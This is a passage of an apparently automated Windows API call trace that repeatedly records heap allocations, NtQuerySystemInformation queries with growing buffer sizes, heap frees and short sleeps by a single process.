lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.702] Sleep (dwMilliseconds=0x110) [0304.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0304.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0304.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0304.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0304.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0304.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0304.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0304.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0304.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.722] Sleep (dwMilliseconds=0x110) [0304.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0304.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0304.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0304.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0304.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0304.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0304.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0304.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0304.742] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.742] Sleep (dwMilliseconds=0x110) [0304.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0304.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0304.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0304.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0304.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0304.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0304.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0304.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0304.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.750] Sleep (dwMilliseconds=0x110) [0304.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0304.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0304.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0304.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0304.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0304.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0304.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0304.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0304.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.766] Sleep (dwMilliseconds=0x110) [0304.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0304.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0304.840] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0304.840] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0304.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0304.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0304.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0304.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0304.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.844] Sleep (dwMilliseconds=0x110) [0304.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0304.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0304.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0304.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0304.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0304.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0304.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0304.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0304.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.913] Sleep (dwMilliseconds=0x110) [0304.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0304.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0304.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0304.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0304.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0304.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0304.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0304.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0304.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.927] Sleep (dwMilliseconds=0x110) [0304.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0304.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0304.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0304.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0304.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0304.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0304.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0304.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0304.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.942] Sleep (dwMilliseconds=0x110) [0304.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0304.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0304.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0304.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0304.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0304.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0304.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0304.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0304.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.954] Sleep (dwMilliseconds=0x110) [0304.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0304.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0304.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0304.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0304.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0304.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0304.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0304.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0304.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.980] Sleep (dwMilliseconds=0x110) [0305.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0305.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0305.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0305.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0305.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0305.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0305.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0305.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0305.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.023] Sleep (dwMilliseconds=0x110) [0305.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0305.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0305.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0305.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.071] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0305.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0305.071] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.072] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0305.072] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0305.072] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.073] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0305.073] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.073] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.073] Sleep (dwMilliseconds=0x110) [0305.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0305.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0305.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0305.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0305.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0305.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0305.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0305.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0305.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.128] Sleep (dwMilliseconds=0x110) [0305.152] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0305.152] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.153] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0305.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0305.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0305.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0305.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0305.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0305.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0305.155] 